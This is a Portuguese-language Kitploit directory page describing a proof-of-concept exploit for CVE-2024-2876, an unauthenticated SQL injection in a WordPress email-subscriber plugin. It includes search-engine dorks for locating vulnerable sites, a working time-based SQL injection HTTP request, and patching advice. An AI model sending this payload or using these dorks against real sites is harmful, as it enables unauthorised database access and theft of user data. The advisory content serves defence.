Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2876 — Prova de conceito de exploit para CVE-2024-2876, uma injeção SQL crítica no plugin Email Subscribers by Icegram Express para WordPress, que permite que atacantes não autenticados executem consultas SQL arbitrárias. | Kitploit
Ferramentas/GitHubGitHub/aerchy/cve-2024-2876
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubaerchy/cve-2024-2876

CVE-2024-2876

Prova de conceito de exploit para CVE-2024-2876, uma injeção SQL crítica no plugin Email Subscribers by Icegram Express para WordPress, que permite que atacantes não autenticados executem consultas SQL arbitrárias.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2876 - Vulnerabilidade de Injeção SQL no Email Subscribers by Icegram Express

Visão Geral

A CVE-2024-2876 é uma vulnerabilidade de segurança crítica encontrada no plugin "Email Subscribers by Icegram Express" para WordPress. Esta vulnerabilidade afeta versões até e incluindo a 5.7.14 e representa riscos significativos para mais de 90.000 sites.

Detalhes da Vulnerabilidade

  • CVE-ID: CVE-2024-2876
  • Pontuação CVSS: 9.8 (Crítica)
  • Versões Afetadas: Até a 5.7.14
  • Versão Corrigida: 5.7.15 e superiores

Descrição

A vulnerabilidade é uma falha de injeção SQL que permite que atacantes não autenticados executem consultas SQL maliciosas nos bancos de dados WordPress afetados. Ao manipular entradas de usuário que não são devidamente sanitizadas, os atacantes podem extrair informações sensíveis, como nomes de usuário, endereços de e-mail, hashes de senhas e listas de assinantes.

Mecanismo de Exploração

A injeção SQL ocorre dentro da função run da classe do plugin, onde a validação inadequada de entrada leva à execução não autorizada de código SQL. Isso compromete a integridade e a confidencialidade dos dados armazenados no banco de dados WordPress.

IG_ES_Subscribers_Query

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Recomendações

  1. Atualização Imediata: Se você estiver usando o plugin "Email Subscribers by Icegram Express", atualize para a versão 5.7.15 ou posterior imediatamente para aplicar a correção de segurança.

  2. Auditorias Regulares: Revise e atualize regularmente todos os plugins e temas do WordPress para suas versões mais recentes para garantir a segurança.

  3. Plugins de Segurança: Use plugins de segurança WordPress confiáveis para reforçar as defesas contra injeção SQL e outras ameaças cibernéticas.

  4. Políticas de Senha Fortes: Implemente senhas fortes e únicas para todas as contas relacionadas ao seu site WordPress para reduzir os riscos de acesso não autorizado.

Impacto da Não Conformidade

Não atualizar o plugin afetado pode deixar os sites vulneráveis a violações de dados e acesso não autorizado. Dado o uso generalizado deste plugin, uma ação imediata é crucial para proteger as instalações.

Baixar ferramenta